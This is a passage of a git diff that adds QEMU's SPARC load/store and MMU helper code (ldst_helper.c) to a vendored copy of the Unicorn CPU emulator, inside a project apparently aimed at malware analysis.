//trace_int_helper_set_softint(env->softint); + } +} + +void helper_clear_softint(CPUSPARCState *env, uint64_t value) +{ + if (do_modify_softint(env, env->softint & (uint32_t)~value)) { + //trace_int_helper_clear_softint(env->softint); + } +} + +void helper_write_softint(CPUSPARCState *env, uint64_t value) +{ + if (do_modify_softint(env, (uint32_t)value)) { + //trace_int_helper_write_softint(env->softint); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/ldst_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/ldst_helper.c new file mode 100644 index 0000000..94f75d0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/ldst_helper.c @@ -0,0 +1,2460 @@ +/* + * Helpers for loads and stores + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +//#define DEBUG_MMU +//#define DEBUG_MXCC +//#define DEBUG_UNALIGNED +//#define DEBUG_UNASSIGNED +//#define DEBUG_ASI +//#define DEBUG_CACHE_CONTROL + +#ifdef DEBUG_MMU +#define DPRINTF_MMU(fmt, ...) \ + do { printf("MMU: " fmt , ## __VA_ARGS__); } while (0) +#else +#define DPRINTF_MMU(fmt, ...) do {} while (0) +#endif + +#ifdef DEBUG_MXCC +#define DPRINTF_MXCC(fmt, ...) \ + do { printf("MXCC: " fmt , ## __VA_ARGS__); } while (0) +#else +#define DPRINTF_MXCC(fmt, ...) do {} while (0) +#endif + +#ifdef DEBUG_ASI +#define DPRINTF_ASI(fmt, ...) \ + do { printf("ASI: " fmt , ## __VA_ARGS__); } while (0) +#endif + +#ifdef DEBUG_CACHE_CONTROL +#define DPRINTF_CACHE_CONTROL(fmt, ...) \ + do { printf("CACHE_CONTROL: " fmt , ## __VA_ARGS__); } while (0) +#else +#define DPRINTF_CACHE_CONTROL(fmt, ...) do {} while (0) +#endif + +#ifdef TARGET_SPARC64 +#ifndef TARGET_ABI32 +#define AM_CHECK(env1) ((env1)->pstate & PS_AM) +#else +#define AM_CHECK(env1) (1) +#endif +#endif + +#define QT0 (env->qt0) +#define QT1 (env->qt1) + +#if defined(TARGET_SPARC64) && !defined(CONFIG_USER_ONLY) +/* Calculates TSB pointer value for fault page size 8k or 64k */ +static uint64_t ultrasparc_tsb_pointer(uint64_t tsb_register, + uint64_t tag_access_register, + int page_size) +{ + uint64_t tsb_base = tsb_register & ~0x1fffULL; + int tsb_split = (tsb_register & 0x1000ULL) ? 1 : 0; + int tsb_size = tsb_register & 0xf; + + /* discard lower 13 bits which hold tag access context */ + uint64_t tag_access_va = tag_access_register & ~0x1fffULL; + + /* now reorder bits */ + uint64_t tsb_base_mask = ~0x1fffULL; + uint64_t va = tag_access_va; + + /* move va bits to correct position */ + if (page_size == 8*1024) { + va >>= 9; + } else if (page_size == 64*1024) { + va >>= 12; + } + + if (tsb_size) { + tsb_base_mask <<= tsb_size; + } + + /* calculate tsb_base mask and adjust va if split is in use */ + if (tsb_split) { + if (page_size == 8*1024) { + va &= ~(1ULL << (13 + tsb_size)); + } else if (page_size == 64*1024) { + va |= (1ULL << (13 + tsb_size)); + } + tsb_base_mask <<= 1; + } + + return ((tsb_base & tsb_base_mask) | (va & ~tsb_base_mask)) & ~0xfULL; +} + +/* Calculates tag target register value by reordering bits + in tag access register */ +static uint64_t ultrasparc_tag_target(uint64_t tag_access_register) +{ + return ((tag_access_register & 0x1fff) << 48) | (tag_access_register >> 22); +} + +static void replace_tlb_entry(SparcTLBEntry *tlb, + uint64_t tlb_tag, uint64_t tlb_tte, + CPUSPARCState *env1) +{ + target_ulong mask, size, va, offset; + + /* flush page range if translation is valid */ + if (TTE_IS_VALID(tlb->tte)) { + CPUState *cs = CPU(sparc_env_get_cpu(env1)); + + mask = 0xffffffffffffe000ULL; + mask <<= 3 * ((tlb->tte >> 61) & 3); + size = ~mask + 1; + + va = tlb->tag & mask; + + for (offset = 0; offset < size; offset += TARGET_PAGE_SIZE) { + tlb_flush_page(cs, va + offset); + } + } + + tlb->tag = tlb_tag; + tlb->tte = tlb_tte; +} + +static void demap_tlb(SparcTLBEntry *tlb, target_ulong demap_addr, + const char *strmmu, CPUSPARCState *env1) +{ + unsigned int i; + target_ulong mask; + uint64_t context; + + int is_demap_context = (demap_addr >> 6) & 1; + + /* demap context */ + switch ((demap_addr >> 4) & 3) { + case 0: /* primary */ + context = env1->dmmu.mmu_primary_context; + break; + case 1: /* secondary */ + context = env1->dmmu.mmu_secondary_context; + break; + case 2: /* nucleus */ + context = 0; + break; + case 3: /* reserved */ + default: + return; + } + + for (i = 0; i < 64; i++) { + if (TTE_IS_VALID(tlb[i].tte)) { + + if (is_demap_context) { + /* will remove non-global entries matching context value */ + if (TTE_IS_GLOBAL(tlb[i].tte) || + !tlb_compare_context(&tlb[i], context)) { + continue; + } + } else { + /* demap page + will remove any entry matching VA */ + mask = 0xffffffffffffe000ULL; + mask <<= 3 * ((tlb[i].tte >> 61) & 3); + + if (!compare_masked(demap_addr, tlb[i].tag, mask)) { + continue; + } + + /* entry should be global or matching context value */ + if (!TTE_IS_GLOBAL(tlb[i].tte) && + !tlb_compare_context(&tlb[i], context)) { + continue; + } + } + + replace_tlb_entry(&tlb[i], 0, 0, env1); +#ifdef DEBUG_MMU + DPRINTF_MMU("%s demap invalidated entry [%02u]\n", strmmu, i); + dump_mmu(stdout, fprintf, env1); +#endif + } + } +} + +static void replace_tlb_1bit_lru(SparcTLBEntry *tlb, + uint64_t tlb_tag, uint64_t tlb_tte, + const char *strmmu, CPUSPARCState *env1) +{ + unsigned int i, replace_used; + + /* Try replacing invalid entry */ + for (i = 0; i < 64; i++) { + if (!TTE_IS_VALID(tlb[i].tte)) { + replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); +#ifdef DEBUG_MMU + DPRINTF_MMU("%s lru replaced invalid entry [%i]\n", strmmu, i); + dump_mmu(stdout, fprintf, env1); +#endif + return; + } + } + + /* All entries are valid, try replacing unlocked entry */ + + for (replace_used = 0; replace_used < 2; ++replace_used) { + + /* Used entries are not replaced on first pass */ + + for (i = 0; i < 64; i++) { + if (!TTE_IS_LOCKED(tlb[i].tte) && !TTE_IS_USED(tlb[i].tte)) { + + replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); +#ifdef DEBUG_MMU + DPRINTF_MMU("%s lru replaced unlocked %s entry [%i]\n", + strmmu, (replace_used ? "used" : "unused"), i); + dump_mmu(stdout, fprintf, env1); +#endif + return; + } + } + + /* Now reset used bit and search for unused entries again */ + + for (i = 0; i < 64; i++) { + TTE_SET_UNUSED(tlb[i].tte); + } + } + +#ifdef DEBUG_MMU + DPRINTF_MMU("%s lru replacement failed: no entries available\n", strmmu); +#endif + /* error state? */ +} + +#endif + +void helper_check_align(CPUSPARCState *env, target_ulong addr, uint32_t align) +{ + if (addr & align) { +#ifdef DEBUG_UNALIGNED + printf("Unaligned access to 0x" TARGET_FMT_lx " from 0x" TARGET_FMT_lx + "\n", addr, env->pc); +#endif + helper_raise_exception(env, TT_UNALIGNED); + } +} + +#if !defined(TARGET_SPARC64) && !defined(CONFIG_USER_ONLY) && \ + defined(DEBUG_MXCC) +static void dump_mxcc(CPUSPARCState *env) +{ + printf("mxccdata: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 + "\n", + env->mxccdata[0], env->mxccdata[1], + env->mxccdata[2], env->mxccdata[3]); + printf("mxccregs: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 + "\n" + " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 + "\n", + env->mxccregs[0], env->mxccregs[1], + env->mxccregs[2], env->mxccregs[3], + env->mxccregs[4], env->mxccregs[5], + env->mxccregs[6], env->mxccregs[7]); +} +#endif + +#if (defined(TARGET_SPARC64) || !defined(CONFIG_USER_ONLY)) \ + && defined(DEBUG_ASI) +static void dump_asi(const char *txt, target_ulong addr, int asi, int size, + uint64_t r1) +{ + switch (size) { + case 1: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %02" PRIx64 "\n", txt, + addr, asi, r1 & 0xff); + break; + case 2: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %04" PRIx64 "\n", txt, + addr, asi, r1 & 0xffff); + break; + case 4: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %08" PRIx64 "\n", txt, + addr, asi, r1 & 0xffffffff); + break; + case 8: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %016" PRIx64 "\n", txt, + addr, asi, r1); + break; + } +} +#endif + +#ifndef TARGET_SPARC64 +#ifndef CONFIG_USER_ONLY + + +/* Leon3 cache control */ + +static void leon3_cache_control_st(CPUSPARCState *env, target_ulong addr, + uint64_t val, int size) +{ + DPRINTF_CACHE_CONTROL("st addr:%08x, val:%" PRIx64 ", size:%d\n", + addr, val, size); + + if (size != 4) { + DPRINTF_CACHE_CONTROL("32bits only\n"); + return; + } + + switch (addr) { + case 0x00: /* Cache control */ + + /* These values must always be read as zeros */ + val &= ~CACHE_CTRL_FD; + val &= ~CACHE_CTRL_FI; + val &= ~CACHE_CTRL_IB; + val &= ~CACHE_CTRL_IP; + val &= ~CACHE_CTRL_DP; + + env->cache_control = val; + break; + case 0x04: /* Instruction cache configuration */ + case 0x08: /* Data cache configuration */ + /* Read Only */ + break; + default: + DPRINTF_CACHE_CONTROL("write unknown register %08x\n", addr); + break; + }; +} + +static uint64_t leon3_cache_control_ld(CPUSPARCState *env, target_ulong addr, + int size) +{ + uint64_t ret = 0; + + if (size != 4) { + DPRINTF_CACHE_CONTROL("32bits only\n"); + return 0; + } + + switch (addr) { + case 0x00: /* Cache control */ + ret = env->cache_control; + break; + + /* Configuration registers are read and only always keep those + predefined values */ + + case 0x04: /* Instruction cache configuration */ + ret = 0x10220000; + break; + case 0x08: /* Data cache configuration */ + ret = 0x18220000; + break; + default: + DPRINTF_CACHE_CONTROL("read unknown register %08x\n", addr); + break; + }; + DPRINTF_CACHE_CONTROL("ld addr:%08x, ret:0x%" PRIx64 ", size:%d\n", + addr, ret, size); + return ret; +} + +uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int sign) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + uint64_t ret = 0; +#if defined(DEBUG_MXCC) || defined(DEBUG_ASI) + uint32_t last_addr = addr; +#endif + + helper_check_align(env, addr, size - 1); + switch (asi) { + case 2: /* SuperSparc MXCC registers and Leon3 cache control */ + switch (addr) { + case 0x00: /* Leon3 Cache Control */ + case 0x08: /* Leon3 Instruction Cache config */ + case 0x0C: /* Leon3 Date Cache config */ + if (env->def->features & CPU_FEATURE_CACHE_CTRL) { + ret = leon3_cache_control_ld(env, addr, size); + } + break; + case 0x01c00a00: /* MXCC control register */ + if (size == 8) { + ret = env->mxccregs[3]; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00a04: /* MXCC control register */ + if (size == 4) { + ret = env->mxccregs[3]; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00c00: /* Module reset register */ + if (size == 8) { + ret = env->mxccregs[5]; + /* should we do something here? */ + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00f00: /* MBus port address register */ + if (size == 8) { + ret = env->mxccregs[7]; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + default: + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented address, size: %d\n", addr, + size); + break; + } + DPRINTF_MXCC("asi = %d, size = %d, sign = %d, " + "addr = %08x -> ret = %" PRIx64 "," + "addr = %08x\n", asi, size, sign, last_addr, ret, addr); +#ifdef DEBUG_MXCC + dump_mxcc(env); +#endif + break; + case 3: /* MMU probe */ + case 0x18: /* LEON3 MMU probe */ + { + int mmulev; + + mmulev = (addr >> 8) & 15; + if (mmulev > 4) { + ret = 0; + } else { + ret = mmu_probe(env, addr, mmulev); + } + DPRINTF_MMU("mmu_probe: 0x%08x (lev %d) -> 0x%08" PRIx64 "\n", + addr, mmulev, ret); + } + break; + case 4: /* read MMU regs */ + case 0x19: /* LEON3 read MMU regs */ + { + int reg = (addr >> 8) & 0x1f; + + ret = env->mmuregs[reg]; + if (reg == 3) { /* Fault status cleared on read */ + env->mmuregs[3] = 0; + } else if (reg == 0x13) { /* Fault status read */ + ret = env->mmuregs[3]; + } else if (reg == 0x14) { /* Fault address read */ + ret = env->mmuregs[4]; + } + DPRINTF_MMU("mmu_read: reg[%d] = 0x%08" PRIx64 "\n", reg, ret); + } + break; + case 5: /* Turbosparc ITLB Diagnostic */ + case 6: /* Turbosparc DTLB Diagnostic */ + case 7: /* Turbosparc IOTLB Diagnostic */ + break; + case 9: /* Supervisor code access */ + switch (size) { + case 1: + ret = cpu_ldub_code(env, addr); + break; + case 2: + ret = cpu_lduw_code(env, addr); + break; + default: + case 4: + ret = cpu_ldl_code(env, addr); + break; + case 8: + ret = cpu_ldq_code(env, addr); + break; + } + break; + case 0xa: /* User data access */ + switch (size) { + case 1: + ret = cpu_ldub_user(env, addr); + break; + case 2: + ret = cpu_lduw_user(env, addr); + break; + default: + case 4: + ret = cpu_ldl_user(env, addr); + break; + case 8: + ret = cpu_ldq_user(env, addr); + break; + } + break; + case 0xb: /* Supervisor data access */ + case 0x80: + switch (size) { + case 1: + ret = cpu_ldub_kernel(env, addr); + break; + case 2: + ret = cpu_lduw_kernel(env, addr); + break; + default: + case 4: + ret = cpu_ldl_kernel(env, addr); + break; + case 8: + ret = cpu_ldq_kernel(env, addr); + break; + } + break; + case 0xc: /* I-cache tag */ + case 0xd: /* I-cache data */ + case 0xe: /* D-cache tag */ + case 0xf: /* D-cache data */ + break; + case 0x20: /* MMU passthrough */ + case 0x1c: /* LEON MMU passthrough */ + switch (size) { + case 1: + ret = ldub_phys(cs->as, addr); + break; + case 2: + ret = lduw_phys(cs->as, addr); + break; + default: + case 4: + ret = ldl_phys(cs->as, addr); + break; + case 8: + ret = ldq_phys(cs->as, addr); + break; + } + break; + /* MMU passthrough, 0x100000000 to 0xfffffffff */ + case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: + switch (size) { + case 1: + ret = ldub_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + case 2: + ret = lduw_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + default: + case 4: + ret = ldl_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + case 8: + ret = ldq_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + } + break; + case 0x30: /* Turbosparc secondary cache diagnostic */ + case 0x31: /* Turbosparc RAM snoop */ + case 0x32: /* Turbosparc page table descriptor diagnostic */ + case 0x39: /* data cache diagnostic register */ + ret = 0; + break; + case 0x38: /* SuperSPARC MMU Breakpoint Control Registers */ + { + int reg = (addr >> 8) & 3; + + switch (reg) { + case 0: /* Breakpoint Value (Addr) */ + ret = env->mmubpregs[reg]; + break; + case 1: /* Breakpoint Mask */ + ret = env->mmubpregs[reg]; + break; + case 2: /* Breakpoint Control */ + ret = env->mmubpregs[reg]; + break; + case 3: /* Breakpoint Status */ + ret = env->mmubpregs[reg]; + env->mmubpregs[reg] = 0ULL; + break; + } + DPRINTF_MMU("read breakpoint reg[%d] 0x%016" PRIx64 "\n", reg, + ret); + } + break; + case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ + ret = env->mmubpctrv; + break; + case 0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ + ret = env->mmubpctrc; + break; + case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ + ret = env->mmubpctrs; + break; + case 0x4c: /* SuperSPARC MMU Breakpoint Action */ + ret = env->mmubpaction; + break; + case 8: /* User code access, XXX */ + default: + cpu_unassigned_access(cs, addr, false, false, asi, size); + ret = 0; + break; + } + if (sign) { + switch (size) { + case 1: + ret = (int8_t) ret; + break; + case 2: + ret = (int16_t) ret; + break; + case 4: + ret = (int32_t) ret; + break; + default: + break; + } + } +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return ret; +} + +void helper_st_asi(CPUSPARCState *env, target_ulong addr, uint64_t val, int asi, + int size) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + helper_check_align(env, addr, size - 1); + switch (asi) { + case 2: /* SuperSparc MXCC registers and Leon3 cache control */ + switch (addr) { + case 0x00: /* Leon3 Cache Control */ + case 0x08: /* Leon3 Instruction Cache config */ + case 0x0C: /* Leon3 Date Cache config */ + if (env->def->features & CPU_FEATURE_CACHE_CTRL) { + leon3_cache_control_st(env, addr, val, size); + } + break; + + case 0x01c00000: /* MXCC stream data register 0 */ + if (size == 8) { + env->mxccdata[0] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00008: /* MXCC stream data register 1 */ + if (size == 8) { + env->mxccdata[1] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00010: /* MXCC stream data register 2 */ + if (size == 8) { + env->mxccdata[2] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00018: /* MXCC stream data register 3 */ + if (size == 8) { + env->mxccdata[3] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00100: /* MXCC stream source */ + if (size == 8) { + env->mxccregs[0] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + env->mxccdata[0] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 0); + env->mxccdata[1] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 8); + env->mxccdata[2] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 16); + env->mxccdata[3] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 24); + break; + case 0x01c00200: /* MXCC stream destination */ + if (size == 8) { + env->mxccregs[1] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 0, + env->mxccdata[0]); + stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 8, + env->mxccdata[1]); + stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 16, + env->mxccdata[2]); + stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 24, + env->mxccdata[3]); + break; + case 0x01c00a00: /* MXCC control register */ + if (size == 8) { + env->mxccregs[3] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00a04: /* MXCC control register */ + if (size == 4) { + env->mxccregs[3] = (env->mxccregs[3] & 0xffffffff00000000ULL) + | val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00e00: /* MXCC error register */ + /* writing a 1 bit clears the error */ + if (size == 8) { + env->mxccregs[6] &= ~val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00f00: /* MBus port address register */ + if (size == 8) { + env->mxccregs[7] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + default: + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented address, size: %d\n", addr, + size); + break; + } + DPRINTF_MXCC("asi = %d, size = %d, addr = %08x, val = %" PRIx64 "\n", + asi, size, addr, val); +#ifdef DEBUG_MXCC + dump_mxcc(env); +#endif + break; + case 3: /* MMU flush */ + case 0x18: /* LEON3 MMU flush */ + { + int mmulev; + + mmulev = (addr >> 8) & 15; + DPRINTF_MMU("mmu flush level %d\n", mmulev); + switch (mmulev) { + case 0: /* flush page */ + tlb_flush_page(CPU(cpu), addr & 0xfffff000); + break; + case 1: /* flush segment (256k) */ + case 2: /* flush region (16M) */ + case 3: /* flush context (4G) */ + case 4: /* flush entire */ + tlb_flush(CPU(cpu), 1); + break; + default: + break; + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + } + break; + case 4: /* write MMU regs */ + case 0x19: /* LEON3 write MMU regs */ + { + int reg = (addr >> 8) & 0x1f; + uint32_t oldreg; + + oldreg = env->mmuregs[reg]; + switch (reg) { + case 0: /* Control Register */ + env->mmuregs[reg] = (env->mmuregs[reg] & 0xff000000) | + (val & 0x00ffffff); + /* Mappings generated during no-fault mode or MMU + disabled mode are invalid in normal mode */ + if ((oldreg & (MMU_E | MMU_NF | env->def->mmu_bm)) != + (env->mmuregs[reg] & (MMU_E | MMU_NF | env->def->mmu_bm))) { + tlb_flush(CPU(cpu), 1); + } + break; + case 1: /* Context Table Pointer Register */ + env->mmuregs[reg] = val & env->def->mmu_ctpr_mask; + break; + case 2: /* Context Register */ + env->mmuregs[reg] = val & env->def->mmu_cxr_mask; + if (oldreg != env->mmuregs[reg]) { + /* we flush when the MMU context changes because + QEMU has no MMU context support */ + tlb_flush(CPU(cpu), 1); + } + break; + case 3: /* Synchronous Fault Status Register with Clear */ + case 4: /* Synchronous Fault Address Register */ + break; + case 0x10: /* TLB Replacement Control Register */ + env->mmuregs[reg] = val & env->def->mmu_trcr_mask; + break; + case 0x13: /* Synchronous Fault Status Register with Read + and Clear */ + env->mmuregs[3] = val & env->def->mmu_sfsr_mask; + break; + case 0x14: /* Synchronous Fault Address Register */ + env->mmuregs[4] = val; + break; + default: + env->mmuregs[reg] = val; + break; + } + if (oldreg != env->mmuregs[reg]) { + DPRINTF_MMU("mmu change reg[%d]: 0x%08x -> 0x%08x\n", + reg, oldreg, env->mmuregs[reg]); + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + } + break; + case 5: /* Turbosparc ITLB Diagnostic */ + case 6: /* Turbosparc DTLB Diagnostic */ + case 7: /* Turbosparc IOTLB Diagnostic */ + break; + case 0xa: /* User data access */ + switch (size) { + case 1: + cpu_stb_user(env, addr, val); + break; + case 2: + cpu_stw_user(env, addr, val); + break; + default: + case 4: + cpu_stl_user(env, addr, val); + break; + case 8: + cpu_stq_user(env, addr, val); + break; + } + break; + case 0xb: /* Supervisor data access */ + case 0x80: + switch (size) { + case 1: + cpu_stb_kernel(env, addr, val); + break; + case 2: + cpu_stw_kernel(env, addr, val); + break; + default: + case 4: + cpu_stl_kernel(env, addr, val); + break; + case 8: + cpu_stq_kernel(env, addr, val); + break; + } + break; + case 0xc: /* I-cache tag */ + case 0xd: /* I-cache data */ + case 0xe: /* D-cache tag */ + case 0xf: /* D-cache data */ + case 0x10: /* I/D-cache flush page */ + case 0x11: /* I/D-cache flush segment */ + case 0x12: /* I/D-cache flush region */ + case 0x13: /* I/D-cache flush context */ + case 0x14: /* I/D-cache flush user */ + break; + case 0x17: /* Block copy, sta access */ + { + /* val = src + addr = dst + copy 32 bytes */ + unsigned int i; + uint32_t src = val & ~3, dst = addr & ~3, temp; + + for (i = 0; i < 32; i += 4, src += 4, dst += 4) { + temp = cpu_ldl_kernel(env, src); + cpu_stl_kernel(env, dst, temp); + } + } + break; + case 0x1f: /* Block fill, stda access */ + { + /* addr = dst + fill 32 bytes with val */ + unsigned int i; + uint32_t dst = addr & 7; + + for (i = 0; i < 32; i += 8, dst += 8) { + cpu_stq_kernel(env, dst, val); + } + } + break; + case 0x20: /* MMU passthrough */ + case 0x1c: /* LEON MMU passthrough */ + { + switch (size) { + case 1: + stb_phys(cs->as, addr, val); + break; + case 2: + stw_phys(cs->as, addr, val); + break; + case 4: + default: + stl_phys(cs->as, addr, val); + break; + case 8: + stq_phys(cs->as, addr, val); + break; + } + } + break; + /* MMU passthrough, 0x100000000 to 0xfffffffff */ + case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: + { + switch (size) { + case 1: + stb_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), val); + break; + case 2: + stw_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), val); + break; + case 4: + default: + stl_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), val); + break; + case 8: + stq_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), val); + break; + } + } + break; + case 0x30: /* store buffer tags or Turbosparc secondary cache diagnostic */ + case 0x31: /* store buffer data, Ross RT620 I-cache flush or + Turbosparc snoop RAM */ + case 0x32: /* store buffer control or Turbosparc page table + descriptor diagnostic */ + case 0x36: /* I-cache flash clear */ + case 0x37: /* D-cache flash clear */ + break; + case 0x38: /* SuperSPARC MMU Breakpoint Control Registers*/ + { + int reg = (addr >> 8) & 3; + + switch (reg) { + case 0: /* Breakpoint Value (Addr) */ + env->mmubpregs[reg] = (val & 0xfffffffffULL); + break; + case 1: /* Breakpoint Mask */ + env->mmubpregs[reg] = (val & 0xfffffffffULL); + break; + case 2: /* Breakpoint Control */ + env->mmubpregs[reg] = (val & 0x7fULL); + break; + case 3: /* Breakpoint Status */ + env->mmubpregs[reg] = (val & 0xfULL); + break; + } + DPRINTF_MMU("write breakpoint reg[%d] 0x%016x\n", reg, + env->mmuregs[reg]); + } + break; + case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ + env->mmubpctrv = val & 0xffffffff; + break; + case 0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ + env->mmubpctrc = val & 0x3; + break; + case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ + env->mmubpctrs = val & 0x3; + break; + case 0x4c: /* SuperSPARC MMU Breakpoint Action */ + env->mmubpaction = val & 0x1fff; + break; + case 8: /* User code access, XXX */ + case 9: /* Supervisor code access, XXX */ + default: + cpu_unassigned_access(CPU(sparc_env_get_cpu(env)), + addr, true, false, asi, size); + break; + } +#ifdef DEBUG_ASI + dump_asi("write", addr, asi, size, val); +#endif +} + +#endif /* CONFIG_USER_ONLY */ +#else /* TARGET_SPARC64 */ + +/* returns true if access using this ASI is to have address translated by MMU + otherwise access is to raw physical address */ +static inline int is_translating_asi(int asi) +{ +#ifdef TARGET_SPARC64 + /* Ultrasparc IIi translating asi + - note this list is defined by cpu implementation + */ + if( (asi >= 0x04 && asi <= 0x11) || + (asi >= 0x16 && asi <= 0x19) || + (asi >= 0x1E && asi <= 0x1F) || + (asi >= 0x24 && asi <= 0x2C) || + (asi >= 0x70 && asi <= 0x73) || + (asi >= 0x78 && asi <= 0x79) || + (asi >= 0x80 && asi <= 0xFF) ) + { + return 1; + } + else + { + return 0; + } +#else + /* TODO: check sparc32 bits */ + return 0; +#endif +} + +static inline target_ulong address_mask(CPUSPARCState *env1, target_ulong addr) +{ +#ifdef TARGET_SPARC64 + if (AM_CHECK(env1)) { + addr &= 0xffffffffULL; + } +#endif + return addr; +} + +static inline target_ulong asi_address_mask(CPUSPARCState *env, + int asi, target_ulong addr) +{ + if (is_translating_asi(asi)) { + return address_mask(env, addr); + } else { + return addr; + } +} + +#ifdef CONFIG_USER_ONLY +uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int sign) +{ + uint64_t ret = 0; +#if defined(DEBUG_ASI) + target_ulong last_addr = addr; +#endif + + if (asi < 0x80) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + switch (asi) { + case 0x82: /* Primary no-fault */ + case 0x8a: /* Primary no-fault LE */ + if (page_check_range(addr, size, PAGE_READ) == -1) { +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return 0; + } + /* Fall through */ + case 0x80: /* Primary */ + case 0x88: /* Primary LE */ + { + switch (size) { + case 1: + ret = ldub_raw(addr); + break; + case 2: + ret = lduw_raw(addr); + break; + case 4: + ret = ldl_raw(addr); + break; + default: + case 8: + ret = ldq_raw(addr); + break; + } + } + break; + case 0x83: /* Secondary no-fault */ + case 0x8b: /* Secondary no-fault LE */ + if (page_check_range(addr, size, PAGE_READ) == -1) { +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return 0; + } + /* Fall through */ + case 0x81: /* Secondary */ + case 0x89: /* Secondary LE */ + /* XXX */ + break; + default: + break; + } + + /* Convert from little endian */ + switch (asi) { + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + case 0x8a: /* Primary no-fault LE */ + case 0x8b: /* Secondary no-fault LE */ + switch (size) { + case 